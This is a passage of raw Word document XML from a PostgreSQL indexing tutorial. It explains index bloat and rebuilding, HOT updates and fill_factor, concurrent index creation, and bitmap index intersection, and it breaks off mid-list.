    <w:p w14:paraId="60A37659" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Measuring and fixing bloat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A001429" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012754F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Measure index bloat (PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2B40D4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962B280" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    indexrelname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6695CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    pg_size_pretty(pg_relation_size(indexrelid)) as index_size,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8D568D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    round(100 * (1 - real_frac) :: numeric, 1) as bloat_pct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153E35D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>FROM pgstattuple_approx('schema.table_name')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA4520C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>JOIN pg_stat_user_indexes ON ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC6123" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="17576032" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Rebuild bloated index without locking table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1227E6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>REINDEX INDEX CONCURRENTLY bloated_index_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69914BD7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Creates a new index, swaps it in, drops the old one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0617542C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Allows reads and writes during rebuild (brief lock only at final swap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4804C006" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="79478E2D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Alternative: pg_repack extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4926590C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Rebuilds table and indexes without any locking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32EF35" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HOT (Heap-Only Tuple) updates — reducing index maintenance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FB9E4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>When a PostgreSQL update modifies columns that are NOT indexed, and the new tuple fits on the same heap page as the old tuple, PostgreSQL uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HOT (Heap-Only Tuple)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B4069" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2DB27" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>HOT update conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E4D4B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Updated columns are not indexed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC82630" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. New tuple fits on the same page as the old tuple (sufficient free space)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6DE7AA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D31A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>HOT update behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7545FBA0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Old tuple: marked as dead (no index update needed!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D318EC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  New tuple: written on same page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756FC982" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Old tuple has a pointer to new tuple (HOT chain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C926DC5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788A0DFB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index entries: still point to old tuple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63475A35" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Index scan: follows old tuple → HOT chain → new tuple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435C7F31" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E884FC5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Benefit: NO index updates needed for non-indexed column changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6911A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Greatly reduces write amplification for updates to non-key columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD732BE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → fill_factor setting: reserve free space on heap pages for HOT updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC2A59F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    fill_factor=70: each page is initially filled only 70%, leaving 30% free</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58B5AE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Updates can fit new tuples in the 30% free space → HOT eligible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793EA3DB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Trade-off: 30% space waste on each page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73210BFB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Online Index Creation — Building Indexes Without Downtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D58D19" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL CONCURRENTLY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C92EE17" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC4EBC8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Standard index build (acquires ShareLock — blocks writes during build)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C962236" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX ON orders(customer_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB4130" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="52F0CAE4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>-- Concurrent build (no blocking during build, only brief lock at start/end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA481B7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX CONCURRENTLY ON orders(customer_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1411311C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The concurrent index build process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7295BABD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7529CE02" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Phase 1: Register index, acquire brief lock, initial scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD10B8D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Short ShareUpdateExclusiveLock (doesn't block reads or writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4FE8E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Scan table, build index with all current rows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479681BA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Index marked as "not yet valid" — queries don't use it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FB8506" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B29D3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Phase 2: Second scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F033D4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Capture changes that occurred during Phase 1 (tracked via heap WAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F01445B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Apply to index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA7FFBF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Index marked as "almost valid"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0B0E10" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19276730" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Phase 3: Wait for existing transactions to complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AE5B15" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Acquire brief ShareLock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8E26A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - All transactions that saw the pre-index state must commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F42AF4E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Mark index as "valid"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4C4962" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Release lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A80CCB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFF9992" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Trade-offs vs standard CREATE INDEX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB33701" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  + No blocking during build (critical for production tables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3851E759" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - 2× longer build time (two table scans instead of one)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39250DD6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Cannot be run inside a transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D908FAD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  - Index creation can fail if a deadlock or constraint violation occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4BDE3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    (must drop the failed invalid index and retry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B555F5F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:pict w14:anchorId="06D54072">
          <v:rect id="_x0000_i5429" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="353871F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Advanced Indexing Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5177E764" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Index Intersection and Index Merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF4D40C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When multiple indexes cover parts of a query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E77BFB3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0302333D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Table: products(id, category_id, price, rating, in_stock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06744C5B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: WHERE category_id = 5 AND price &lt; 100 AND in_stock = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A20472" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="00915B88" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63711798" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  idx_category ON products(category_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A2FBFD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  idx_price ON products(price)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9C8B6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  idx_in_stock ON products(in_stock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85E9F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="1B6DD90A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index intersection (Bitmap Index Scan in PostgreSQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C1778" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Scan idx_category for category_id=5 → collect set of row IDs (bitmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D3156" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. Scan idx_price for price&lt;100 → collect set of row IDs (bitmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA6272" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. Scan idx_in_stock for in_stock=true → collect set of row IDs (bitmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408F7DB7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  4. AND the three bitmaps → rows satisfying ALL conditions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD6A833" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  5. Fetch heap pages for matching rows, sort by physical location (efficient I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FF9ABF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE072A4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Better alternative: composite index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799AF4F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  CREATE INDEX ON products(category_id, price) WHERE in_stock = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B382AA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Single index scan, no bitmap intersection overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A887C1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Orders of magnitude faster for this specific query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416CC257" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The bitmap heap scan optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04686B89" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Rather than fetching heap pages in random order (one per matching row), the bitmap heap scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F217C6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1492"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
